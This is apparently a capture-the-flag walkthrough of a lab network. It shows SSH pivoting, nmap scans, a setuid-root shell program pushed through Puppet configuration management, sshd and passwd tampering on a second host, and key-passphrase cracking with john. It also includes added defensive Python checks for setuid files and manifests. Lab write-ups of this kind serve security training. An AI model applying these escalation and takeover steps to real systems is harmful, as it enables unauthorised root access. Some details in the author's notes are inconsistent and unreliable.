- inet6 addr: fe80::fc54:ff:fe6d:936a/64 Scope:Link
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- RX packets:2813 errors:0 dropped:0 overruns:0 frame:0
- TX packets:9567 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:500
- RX bytes:1376378 (1.3 MB) TX bytes:1621185 (1.6 MB)
- vnet1 Link encap:Ethernet HWaddr fe:54:00:5b:05:f7
- inet6 addr: fe80::fc54:ff:fe5b:5f7/64 Scope:Link
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- RX packets:2845 errors:0 dropped:0 overruns:0 frame:0
- TX packets:10528 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:500
- RX bytes:1270004 (1.2 MB) TX bytes:1795087 (1.7 MB)
- root@analoguepond:/var/run# ip link
- 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default
- link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
- 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP mode DEFAULT group default qlen 1000
- link/ether 08:00:27:c0:69:94 brd ff:ff:ff:ff:ff:ff
- 3: virbr0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default
- link/ether 52:54:00:b2:23:25 brd ff:ff:ff:ff:ff:ff
- 4: virbr0-nic: <BROADCAST,MULTICAST> mtu 1500 qdisc pfifo_fast master virbr0 state DOWN mode DEFAULT group default qlen 500
- link/ether 52:54:00:b2:23:25 brd ff:ff:ff:ff:ff:ff
- 5: vnet0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master virbr0 state UNKNOWN mode DEFAULT group default qlen 500
- link/ether fe:54:00:6d:93:6a brd ff:ff:ff:ff:ff:ff
- 6: vnet1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master virbr0 state UNKNOWN mode DEFAULT group default qlen 500
- link/ether fe:54:00:5b:05:f7 brd ff:ff:ff:ff:ff:ff
- root@analoguepond:/var/run# iptables
- iptables v1.4.21: no command specified
- Try `iptables -h' or 'iptables --help' for more information.
- root@analoguepond:/var/run# iptables --list
- Chain INPUT (policy ACCEPT)
- target prot opt source destination
- ACCEPT udp -- anywhere anywhere udp dpt:domain
- ACCEPT tcp -- anywhere anywhere tcp dpt:domain
- ACCEPT udp -- anywhere anywhere udp dpt:bootps
- ACCEPT tcp -- anywhere anywhere tcp dpt:bootps
- Chain FORWARD (policy ACCEPT)
- target prot opt source destination
- ACCEPT all -- anywhere 192.168.122.0/24 ctstate RELATED,ESTABLISHED
- ACCEPT all -- 192.168.122.0/24 anywhere
- ACCEPT all -- anywhere anywhere
- REJECT all -- anywhere anywhere reject-with icmp-port-unreachable
- REJECT all -- anywhere anywhere reject-with icmp-port-unreachable
- Chain OUTPUT (policy ACCEPT)
- target prot opt source destination
- ACCEPT udp -- anywhere anywhere udp dpt:bootpc
- So there is another subnet, 192.168.122.0/24.
- We check for nodes on it.
- root@analoguepond:/var/run# nmap -sN 192.168.122.0/24
- Nmap scan report for puppet.example.com (192.168.122.2)
- PORT STATE SERVICE
- 22/tcp open|filtered ssh
- MAC Address: 52:54:00:5B:05:F7 (QEMU Virtual NIC)
- Nmap scan report for barringsbank.example.com (192.168.122.3)
- PORT STATE SERVICE
- 22/tcp open|filtered ssh
- MAC Address: 52:54:00:6D:93:6A (QEMU Virtual NIC)
- ssh eric@192.168.122.2
- The authenticity of host '192.168.122.2 (192.168.122.2)' can't be established.
- ECDSA key fingerprint is 4e:e6:d6:38:8a:9b:3c:aa:0c:55:95:a6:57:ce:f9:e5.
- Are you sure you want to continue connecting (yes/no)? yes
- Warning: Permanently added '192.168.122.2' (ECDSA) to the list of known hosts.
- +-----------------------------------------------------------------------------+
- | Passwords are very dated.. Removing spaces helps sandieshaw log in with her |
- | most famous song |
- +-----------------------------------------------------------------------------+
- eric@192.168.122.2's password:
- Is the user now "sandieshaw"?
- We try: puppetonastring
- ssh sandieshaw@192.168.122.2's password:
- Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 4.4.0-57-generic x86_64)
- * Documentation: https://help.ubuntu.com/
- System information disabled due to load higher than 1.0
- The programs included with the Ubuntu system are free software;
- the exact distribution terms for each program are described in the
- individual files in /usr/share/doc/*/copyright.
- Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
- applicable law.
- sandieshaw@puppet:~$ id
- uid=1000(sandieshaw) gid=1000(sandieshaw) groups=1000(sandieshaw),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare)
- sandieshaw@puppet:~$
- We nmap scan 192.168.122.2 and find port 8140 has a WEBrick web server on it. The victim machine does not currently have proxychains installed, but since we're root, why not install it.
- apt-get install proxychains
- ssh -f -N -D 7171 sandieshaw@192.168.122.2
- root@analoguepond:~# ssh -f -N -D 7171 sandieshaw@192.168.122.2
- +-----------------------------------------------------------------------------+
- | Passwords are very dated.. Removing spaces helps sandieshaw log in with her |
- | most famous song |
- +-----------------------------------------------------------------------------+
- sandieshaw@192.168.122.2's password:
- root@analoguepond:~# netstat -antplu
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
- tcp 0 0 192.168.122.1:53 0.0.0.0:* LISTEN 1192/dnsmasq
- tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 915/sshd
- tcp 0 0 127.0.0.1:7171 0.0.0.0:* LISTEN 6977/ssh
- tcp 0 0 127.0.0.1:5900 0.0.0.0:* LISTEN 1199/qemu-system-x8
- tcp 0 0 127.0.0.1:5901 0.0.0.0:* LISTEN 1233/qemu-system-x8
- tcp 0 0 192.168.1.249:22 192.168.1.66:52436 ESTABLISHED 5314/sshd: eric [pr
- tcp 0 0 192.168.1.249:22 192.168.1.66:52696 ESTABLISHED 5533/sshd: eric [pr
- tcp 0 0 192.168.1.249:22 192.168.1.66:52422 ESTABLISHED 5276/sshd: eric [pr
- tcp 0 0 192.168.1.249:22 192.168.1.66:52544 ESTABLISHED 5475/sshd: eric [pr
- tcp 0 0 192.168.122.1:50416 192.168.122.2:22 ESTABLISHED 6977/ssh
- tcp 0 0 192.168.1.249:22 192.168.1.66:52920 ESTABLISHED 6541/sshd: eric [pr
- tcp 0 0 192.168.122.1:40201 192.168.122.2:22 ESTABLISHED 6532/ssh
- tcp6 0 0 :::22 :::* LISTEN 915/sshd
- tcp6 0 0 ::1:7171 :::* LISTEN 6977/ssh
- udp 0 0 0.0.0.0:42984 0.0.0.0:* 976/snmpd
- udp 0 0 192.168.122.1:53 0.0.0.0:* 1192/dnsmasq
- udp 0 0 0.0.0.0:67 0.0.0.0:* 1192/dnsmasq
- udp 0 0 0.0.0.0:68 0.0.0.0:* 662/dhclient
- udp 12480 0 0.0.0.0:41040 0.0.0.0:* 662/dhclient
- udp 0 0 0.0.0.0:161 0.0.0.0:* 976/snmpd
- udp6 0 0 ::1:161 :::* 976/snmpd
- udp6 0 0 :::39304 :::* 662/dhclient
- root@analoguepond:~#
- Now we should be able to reach the new host (I hope).
- We open Firefox and set up a SOCKS proxy with host 127.0.0.1 and our SSH tunnel port 7070.
- Then we open https://192.168.122.2:8140/ and we can reach the website on the inner server.
- The environment must be purely alphanumeric, not ''
- https://192.168.122.2:8140/0x27
- The indirection name must be purely alphanumeric, not ''
- Will come back to this after I think a bit more on ideas.
- As of now, we should start enumerating what is here, as we also have sandieshaw's login over SSH. Let's look for the web files.
- sandieshaw@puppet:/tmp$ cat /etc/passwd
- root:x:0:0:root:/root:/bin/bash
- daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
- bin:x:2:2:bin:/bin:/usr/sbin/nologin
- sys:x:3:3:sys:/dev:/usr/sbin/nologin
- sync:x:4:65534:sync:/bin:/bin/sync
- games:x:5:60:games:/usr/games:/usr/sbin/nologin
- man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
- lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
- mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
- news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
- uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
- proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
- www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
- backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
- list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
- irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
- gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
- nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
- libuuid:x:100:101::/var/lib/libuuid:
- syslog:x:101:104::/home/syslog:/bin/false
- messagebus:x:102:106::/var/run/dbus:/bin/false
- landscape:x:103:109::/var/lib/landscape:/bin/false
- sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
- sandieshaw:x:1000:1000:Sandra Ann Goodrich,,,:/home/sandieshaw:/bin/bash
- puppet:x:105:112:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false
- sandieshaw@puppet:/tmp$
- # Let's update our hosts file again.
- 192.168.1.249 analoguepond
- 192.168.122.2 puppet.example.com
- 192.168.122.3 barringsbank.example.com
- quick reminders:
- VNC Port forwarding through tunnel:
- ssh -L 5901:127.0.0.1:5901 -N -f -l eric 192.168.1.249
- ssh -L 5900:127.0.0.1:5900 -N -f -l eric 192.168.1.249
- Dynamic SSH tunnel for proxychains:
- ssh -f -N -D 7070 eric@192.168.1.249
- while SSH'ed into 192.168.1.249
- ssh sandieshaw@192.168.122.2
- puppetonastring
- from within 192.168.1.249
- apt-get install nmap
- nmap -sC -sV -T5 -v -p- --script vuln 192.168.122.3
- Nmap scan report for barringsbank.example.com (192.168.122.3)
- Host is up (0.0048s latency).
- Not shown: 65534 closed ports
- PORT STATE SERVICE VERSION
- 22/tcp open tcpwrapped
- On puppet, as sandieshaw, there is a program in /tmp called spin. When run, it draws a spinning symbol on the screen. After copying it out to our machine and running strings, we see lots of function names but no clue what they do. So we start browsing the system, and we find another spin file: it's in /etc/puppet/wiffle/files/spin, alongside a spin.c.
- We place a bash script named spin in this directory, then wait, and later find that our shell script has been moved to /tmp as /tmp/spin with system privileges. However, even though it's owned by root as a system file, it doesn't give us a shell, as it runs in the same user context as us, which is a limited user shell.
- We try another method, using a C program as follows.
- /* gcc root.c -o spin */
- #define _GNU_SOURCE      /* setresuid() is a GNU extension */
- #include <stdlib.h>      /* system() */
- #include <unistd.h>      /* setresuid() */
- int main(void){
-     setresuid(0, 0, 0);  /* set real, effective and saved uid to 0; only works once the file is installed setuid root */
-     system("/bin/bash");
-     return 0;
- }
- We compile it locally, move it to eric and then down to sandieshaw. We place it back in the /etc/puppet/wiggle/files/ directory as spin, and then wait till it gets moved back to /tmp again. This time around, it executes our setuid call and spawns us a shell as root!
- :)
- sandieshaw@puppet:/tmp$ ls -la
- total 24
- drwxrwxrwt 2 root root 4096 Apr 26 08:30 .
- drwxr-xr-x 22 root root 4096 Jan 7 11:45 ..
- -rwsr-xr-x 1 root root 8688 Apr 26 08:30 spin
- -rwxrwxr-x 1 sandieshaw sandieshaw 22 Apr 26 07:32 uname
- sandieshaw@puppet:/tmp$ spin
- root@puppet:/tmp# id
- uid=0(root) gid=1000(sandieshaw) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(sandieshaw)
- root@puppet:/tmp#
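What the ls -la above shows is the whole problem in one line: a root-owned setuid binary that configuration management dropped into world-writable /tmp from a directory the low-privilege user could write to. Added example (not the author's tooling): a Python check that flags setuid-root files and unsafe world-writable directories, once over captured `ls -la` text (SAMPLE_LISTING is constructed to mirror the listing above) and once over a live directory with os.stat.

```python
"""Flag setuid-root binaries, especially inside world-writable directories, and
world-writable directories without the sticky bit. Added example; SAMPLE_LISTING
is constructed in the shape of the `ls -la /tmp` output from the puppet VM."""
import os
import re
import stat

SAMPLE_LISTING = """\
total 24
drwxrwxrwt 2 root root 4096 Apr 26 08:30 .
drwxr-xr-x 22 root root 4096 Jan 7 11:45 ..
-rwsr-xr-x 1 root root 8688 Apr 26 08:30 spin
-rwxrwxr-x 1 sandieshaw sandieshaw 22 Apr 26 07:32 uname
"""

# type, 9 permission chars, links, owner, group, size, month, day, time-or-year, name
LS_LINE = re.compile(
    r"^([-dlcbps])([rwxsStT-]{9})\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\S+\s+\d+\s+[\d:]+\s+(.+)$")


def parse_ls_line(line):
    """Turn one `ls -l` line into a dict, or None for lines like 'total 24'."""
    m = LS_LINE.match(line)
    if not m:
        return None
    ftype, perms, owner, group, name = m.groups()
    return {"type": ftype, "owner": owner, "group": group, "name": name,
            "setuid": perms[2] in "sS", "setgid": perms[5] in "sS",
            "world_writable": perms[7] == "w", "sticky": perms[8] in "tT"}


def scan_listing(text):
    """Findings [(severity, name, reason)] from captured `ls -la` of one directory."""
    entries = [e for e in map(parse_ls_line, text.splitlines()) if e]
    here = next((e for e in entries if e["name"] == "."), None)
    dir_ww = bool(here and here["world_writable"])
    findings = []
    for e in entries:
        if e["type"] == "-" and e["setuid"] and e["owner"] == "root":
            where = " in a world-writable directory" if dir_ww else ""
            findings.append(("high" if dir_ww else "medium", e["name"], "setuid-root binary" + where))
        elif e["type"] == "d" and e["name"] not in (".", "..") and e["world_writable"] and not e["sticky"]:
            findings.append(("medium", e["name"], "world-writable directory without sticky bit"))
    return findings


def scan_dir(path):
    """Same checks against a live directory; works as any user able to stat the entries."""
    dir_ww = bool(os.stat(path).st_mode & stat.S_IWOTH)
    findings = []
    for entry in os.scandir(path):
        st = entry.stat(follow_symlinks=False)
        if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and st.st_uid == 0:
            where = " in a world-writable directory" if dir_ww else ""
            findings.append(("high" if dir_ww else "medium", entry.name, "setuid-root binary" + where))
        elif stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_IWOTH and not st.st_mode & stat.S_ISVTX:
            findings.append(("medium", entry.name, "world-writable directory without sticky bit"))
    return findings


if __name__ == "__main__":
    print(scan_listing(SAMPLE_LISTING))
    print(scan_dir("/tmp"))
```

The fix on the management side is the usual one: a config-management file resource should never take its source from a directory the managed user can write, and should set an explicit mode rather than carrying over whatever bits the source file had.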
- We go to the root folder and have a look around.
- ./protovision:
- total 24K
- 4.0K drwxr-xr-x 3 root root 4.0K Dec 21 23:20 .
- 4.0K drwx------ 4 root root 4.0K Jan 7 17:49 ..
- 4.0K -rw-r--r-- 1 root root 401 Dec 21 22:15 flag1.txt.0xff
- 4.0K drwxr-xr-x 3 root root 4.0K Dec 21 23:20 .I_have_you_now
- 4.0K -rw-r--r-- 1 root root 39 Dec 17 12:51 jim
- 4.0K -rw-r--r-- 1 root root 53 Dec 17 12:51 melvin
- ./protovision/.I_have_you_now:
- total 84K
- 4.0K drwxr-xr-x 3 root root 4.0K Dec 21 23:20 .
- 4.0K drwxr-xr-x 3 root root 4.0K Dec 21 23:20 ..
- 4.0K drwxr-xr-x 3 root root 4.0K Dec 18 15:29 .a
- 72K -r-------- 1 root root 71K Dec 18 15:23 grauniad_1995-02-27.jpeg
- ./protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z:
- total 16K
- 4.0K drwxr-xr-x 2 root root 4.0K Dec 21 23:20 .
- 4.0K drwxr-xr-x 3 root root 4.0K Dec 18 18:42 ..
- 4.0K ---x------ 1 root root 7 Dec 18 15:34 my_world_you_are_persistent_try
- 4.0K -rw-r--r-- 1 root root 1.4K Dec 21 22:10 nleeson_key.gpg
- less /root/protovision/flag1.txt.0xff
- root@puppet:/root# cat /root/protovision/jim /root/protovision/melvin /root/protovision/flag1.txt.0xff
- Mr Potato Head! Backdoors are not a...
- Boy you guys are dumb! I got this all figured out...
- 3d3d674c7534795a756c476130565762764e4849793947496c4a585a6f5248496b4a3362334e3363684248496842435a756c6d5a675148616e6c5762675533623542434c756c47497a564764313557617442794d79415362764a6e5a674d585a7446325a79463256676732593046326467777961793932646751334a754e585a765247497a6c47613042695a4a4279615535454d70647a614b706b5a48316a642f67325930463264763032626a35535a6956486431395765756333643339794c364d486330524861
- root@puppet:/root#
- cat flag1.txt.0xff
- 3d3d674c7534795a756c476130565762764e4849793947496c4a585a6f5248496b4a3362334e3363684248496842435a756c6d5a675148616e6c5762675533623542434c756c47497a564764313557617442794d79415362764a6e5a674d585a7446325a79463256676732593046326467777961793932646751334a754e585a765247497a6c47613042695a4a4279615535454d70647a614b706b5a48316a642f67325930463264763032626a35535a6956486431395765756333643339794c364d486330524861
- root@kali:/mnt/HDD2/ctf/analouge-pond# cat flag1.txt.0xff | xxd -r -p | rev | base64 -d
- https://www.youtube.com/watch?v=GfJJk7i0NTk If this doesn't work, watch Wargames from 23 minutes in, you might find a password there or something...
- root@kali:/mnt/HDD2/ctf/analouge-pond#
- ssh root@192.168.122.3
- ssh_exchange_identification: read: Connection reset by peer
- We edit /etc/hosts.deny, which seems to be blocking outbound SSH connections?
- known_hosts on puppet /root/.ssh - |1|qEUhT3+BE6VMnDOqXiC0QTUVaE0=|AntYS4Su9EBESzdihQO62CZgc0A= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLcUc6YYOlbXM7YzsXo/GDT3C2mwx6H8lsBPbKVr+6HBAfdJXpCXSiDh0II3Ie0j2y4e2fjV+x1yHeGVUi3Lff8=
- Eventually we find that the .3 server can be controlled through the puppet scripts in /etc/puppet/modules/vulnhub/files.
- We edit the sshd login settings to allow root login with no password and as an allowed user, and also disable the PAM requirement. We need to wait until spin kicks in and uploads the files (hopefully).
- We also edit the hosts.deny file to allow sshd to do its thing. We know sandieshaw was allowed to log in via the scripts, so let's try her first.
- We copy sandieshaw's entry line from puppet-passwd over to barringsbank-passwd as well, ensuring we have a user on the system (in theory) with the password "password":
- openssl passwd -1 -salt xyz password
- $1$xyz$cEUv8aN9ehjhMXG/kSFnM1
- sandieshaw:$1$xyz$cEUv8aN9ehjhMXG/kSFnM1:1000:1000:Sandra Ann Goodrich,,,:/home/sandieshaw:/bin/bash
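The `$1$xyz$...` value above is an MD5-crypt hash, and checking whether such an entry was built from a weak password is the audit-side counterpart of what the walkthrough does. The following is an added example (not the author's code): a from-scratch MD5-crypt implementation, since Python's `crypt` module has been removed from recent releases, plus a helper that verifies a candidate password against a passwd/shadow line. `PAGE_ENTRY` is the line shown above; all other names are this example's own.

```python
import hashlib

# Added example, not part of the walkthrough: a stand-alone MD5-crypt ($1$)
# implementation so the hash above can be checked without the crypt module.
ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> bytes:
    """crypt's to64(): emit `count` six-bit groups of `value`, least significant first."""
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def md5_crypt(password: str, salt: str) -> str:
    """MD5-crypt as produced by glibc/FreeBSD crypt(3) and `openssl passwd -1`."""
    pw, sl, magic = password.encode(), salt.encode()[:8], b"$1$"
    ctx = hashlib.md5(pw + magic + sl)
    alt = hashlib.md5(pw + sl + pw).digest()
    remaining = len(pw)                      # mix in `alt` once per 16 password bytes
    while remaining > 0:
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    bits = len(pw)                           # one byte per bit of the password length
    while bits:
        ctx.update(b"\0" if bits & 1 else pw[:1])
        bits >>= 1
    final = ctx.digest()
    for i in range(1000):                    # fixed 1000 rounds: far too cheap today
        ctx1 = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            ctx1.update(sl)
        if i % 7:
            ctx1.update(pw)
        ctx1.update(final if i & 1 else pw)
        final = ctx1.digest()
    order = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    enc = b"".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in order)
    enc += _to64(final[11], 2)
    return (magic + sl + b"$" + enc).decode()


def passwd_entry_matches(entry: str, candidate: str) -> bool:
    """True if the $1$ hash in a passwd/shadow line was derived from `candidate`."""
    fields = entry.split(":")
    if len(fields) < 2 or not fields[1].startswith("$1$"):
        raise ValueError("only $1$ (MD5-crypt) entries are handled here")
    _, _, salt, _ = fields[1].split("$", 3)
    return md5_crypt(candidate, salt) == fields[1]


# The passwd line from the walkthrough above
PAGE_ENTRY = "sandieshaw:$1$xyz$cEUv8aN9ehjhMXG/kSFnM1:1000:1000:Sandra Ann Goodrich,,,:/home/sandieshaw:/bin/bash"
```

The `$6$` entry that appears later in the walkthrough is SHA512-crypt and is not covered by this function.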
- ssh sandieshaw@192.168.122.3
- ssh sandieshaw@192.168.122.3
- sandieshaw@192.168.122.3's password:
- Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 4.4.0-57-generic x86_64)
- * Documentation: https://help.ubuntu.com/
- System information as of Wed Apr 26 06:47:18 BST 2017
- System load: 5.81 Memory usage: 4% Processes: 106
- Usage of /: 72.3% of 1.59GB Swap usage: 0% Users logged in: 0
- Graph this data and manage this system at:
- https://landscape.canonical.com/
- 173 packages can be updated.
- 103 updates are security updates.
- New release '16.04.2 LTS' available.
- Run 'do-release-upgrade' to upgrade to it.
- The programs included with the Ubuntu system are free software;
- the exact distribution terms for each program are described in the
- individual files in /usr/share/doc/*/copyright.
- Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
- applicable law.
- The programs included with the Ubuntu system are free software;
- the exact distribution terms for each program are described in the
- individual files in /usr/share/doc/*/copyright.
- Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
- applicable law.
- Could not chdir to home directory /home/sandieshaw: No such file or directory
- nleeson@barringsbank:/$
- That's a nice feeling :)
- We probably should have put an entry in there for the nleeson user with a password too, but let's just play with the system for now..
- nleeson@barringsbank:/home/nleeson$ netstat -antplu
- (No info could be read for "-p": geteuid()=1000 but you should be root.)
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
- tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
- tcp 0 0 192.168.122.3:22 192.168.122.2:35430 ESTABLISHED -
- tcp6 0 0 :::22 :::* LISTEN -
- udp 0 0 0.0.0.0:68 0.0.0.0:* -
- udp 0 0 0.0.0.0:31345 0.0.0.0:* -
- udp6 0 0 :::14309 :::* -
- nleeson@barringsbank:/home/nleeson$
- No webserver running.
- nleeson@barringsbank:/home/nleeson$ cat /etc/issue /etc/*ele*;uname -a
- Ubuntu 14.04.3 LTS \n \l
- DISTRIB_ID=Ubuntu
- DISTRIB_RELEASE=14.04
- DISTRIB_CODENAME=trusty
- DISTRIB_DESCRIPTION="Ubuntu 14.04.3 LTS"
- NAME="Ubuntu"
- VERSION="14.04.3 LTS, Trusty Tahr"
- ID=ubuntu
- ID_LIKE=debian
- PRETTY_NAME="Ubuntu 14.04.3 LTS"
- VERSION_ID="14.04"
- HOME_URL="http://www.ubuntu.com/"
- SUPPORT_URL="http://help.ubuntu.com/"
- BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
- Linux barringsbank 4.4.0-57-generic #78~14.04.1-Ubuntu SMP Sat Dec 10 00:14:47 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
- We're going to put our suid root.c program onto the new host via the puppet init.pp:
- ##w00t for r00t
- file { "/tmp/roots":
- ensure => "directory",
- recurse => true,
- purge => true,
- force => true,
- owner => root,
- group => root,
- mode => 4755,
- source => "puppet:///modules/vulnhub/roots",
- }
- apt-get install nano
- We add this to init.pp on the sandieshaw server, then wait and see if it shows up in /tmp on the nleeson server.
- And we are grooooooot... er, I am root.
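The manifest above is exactly what a defender reviewing Puppet code should catch: a `file` resource with a setuid mode and `recurse => true` makes every binary copied from `source` setuid root on every agent. The following is an added example (not the CTF's or Puppet's code) of a small manifest audit that parses `file` resources with regular expressions and flags setuid/setgid modes; `SAMPLE_MANIFEST` is constructed from the resource above plus a harmless one, and all function names are this example's own.

```python
import re

# Added example, not the CTF's code: flag Puppet `file` resources whose mode
# would deploy setuid/setgid content, as the manifest above does under /tmp/roots.
FILE_RESOURCE_RE = re.compile(r'file\s*\{\s*["\']([^"\']+)["\']\s*:\s*(.*?)\n\s*\}', re.S)
ATTRIBUTE_RE = re.compile(r'(\w+)\s*=>\s*([^,\n]+)')


def parse_file_resources(manifest: str) -> list:
    """Return (title, attributes) for each `file { "title": ... }` block; quotes are stripped."""
    resources = []
    for match in FILE_RESOURCE_RE.finditer(manifest):
        attrs = {k: v.strip().strip('"\'') for k, v in ATTRIBUTE_RE.findall(match.group(2))}
        resources.append((match.group(1), attrs))
    return resources


def is_setuid_mode(mode: str) -> bool:
    """Numeric modes: a leading 4 (setuid) or 2 (setgid) bit; symbolic modes: any 's'."""
    mode = mode.strip()
    if re.fullmatch(r"[0-7]{3,4}", mode):
        return len(mode) == 4 and int(mode[0]) & 0o6 != 0
    return "s" in mode


def audit_setuid_deployments(manifest: str) -> list:
    """List file resources that would land setuid/setgid bits on managed files."""
    findings = []
    for title, attrs in parse_file_resources(manifest):
        mode = attrs.get("mode", "")
        if mode and is_setuid_mode(mode):
            findings.append({"title": title, "mode": mode, "owner": attrs.get("owner"),
                             "source": attrs.get("source"),
                             # with recurse => true the mode applies to every file in the tree
                             "recurse": attrs.get("recurse") == "true"})
    return findings


# Constructed sample: the resource from the walkthrough plus a harmless one
SAMPLE_MANIFEST = """
file { "/tmp/roots":
  ensure => "directory",
  recurse => true,
  purge => true,
  force => true,
  owner => root,
  group => root,
  mode => 4755,
  source => "puppet:///modules/vulnhub/roots",
}
file { "/etc/motd":
  ensure => file,
  owner => root,
  group => root,
  mode => "0644",
  source => "puppet:///modules/vulnhub/motd",
}
"""
```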
- /etc/shadow
- nleeson:$6$sspRmsSA$fD6XXOHUcf1UniBIAuGcFnJ4Qz49IlIdweutehpNDdTk9u9mAeAej9ToMUDrh3af/nsYQ787eXbKFTZpRtRSN/:17150:0:99999:7:::
- web server process on eric? /usr/lib/ruby/vendor_ruby/puppet/application/master.rb
- root@puppet:/usr/lib/ruby/vendor_ruby/puppet/network/http/rack# cat /etc/puppet/puppet.conf
- [main]
- logdir=/var/log/puppet
- vardir=/var/lib/puppet
- ssldir=/var/lib/puppet/ssl
- rundir=/var/run/puppet
- factpath=$vardir/lib/facter
- templatedir=$confdir/templates
- prerun_command=/etc/puppet/etckeeper-commit-pre
- postrun_command=/etc/puppet/etckeeper-commit-post
- certname=puppet.example.com
- [master]
- # These are needed when the puppetmaster is run by passenger
- # and can safely be removed if webrick is used.
- ssl_client_header = SSL_CLIENT_S_DN
- ssl_client_verify_header = SSL_CLIENT_VERIFY
- dns_alt_names = puppet, puppet.example.com
- [agent]
- server = puppet.example.com
- root@puppet:/etc/puppet# cat fileserver.conf
- # This file consists of arbitrarily named sections/modules
- # defining where files are served from and to whom
- # Define a section 'files'
- # Adapt the allow/deny settings to your needs. Order
- # for allow/deny does not matter, allow always takes precedence
- # over deny
- [files]
- path /etc/puppet/files
- # allow *.example.com
- # deny *.evil.example.com
- # allow 192.168.0.0/24
- [plugins]
- # allow *.example.com
- # deny *.evil.example.com
- # allow 192.168.0.0/24
- root@puppet:/etc/puppet#
- nleeson_key.gpg
- root@puppet:~/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z#
- gpg -d nleeson_key.gpg
- gpg: CAST5 encrypted data
- gpg: gpg-agent is not available in this session
- gpg: encrypted with 1 passphrase
- -----BEGIN RSA PRIVATE KEY-----
- Proc-Type: 4,ENCRYPTED
- DEK-Info: AES-128-CBC,1864E0393453C88F778D5E02717B8B16
- -----END RSA PRIVATE KEY-----
- gpg: WARNING: message was not integrity protected
- Verified that the password is joshua.
- john hashes
- Using default input encoding: UTF-8
- Loaded 1 password hash (SSH [RSA/DSA 32/64])
- Press 'q' or Ctrl-C to abort, almost any other key for status
- joshua (nleeson_key.key)
- 1g 0:00:00:00 DONE 2/3 (2017-04-26 11:40) 10.00g/s 123620p/s 123620c/s 123620C/s joshua
- Use the "--show" option to display all of the cracked passwords reliably
- Session completed
- root@analoguepond:/home# ssh -i rsa.key nleeson@192.168.122.3
- Enter passphrase for key 'rsa.key':
- Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 4.4.0-57-generic x86_64)
- * Documentation: https://help.ubuntu.com/
- System information as of Wed Apr 26 14:57:54 BST 2017
- System load: 0.0 Processes: 109
- Usage of /: 72.4% of 1.59GB Users logged in: 0
- Memory usage: 8% IP address for eth0: 192.168.122.3
- Swap usage: 0%
- Graph this data and manage this system at:
- https://landscape.canonical.com/
- 173 packages can be updated.
- 103 updates are security updates.
- New release '16.04.2 LTS' available.
- Run 'do-release-upgrade' to upgrade to it.
- The programs included with the Ubuntu system are free software;
- the exact distribution terms for each program are described in the
- individual files in /usr/share/doc/*/copyright.
- Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
- applicable law.
- nleeson@barringsbank:~$
- so far I have:
- - Troll Flag - flag.txt
- - Flag1.txt.0xff, which gave us the hint for the password "secret" to decode the gpg file
- > - Flag 1: You have it when you book Jennifer tickets to Paris on Pan Am. < reference for secret/wargames
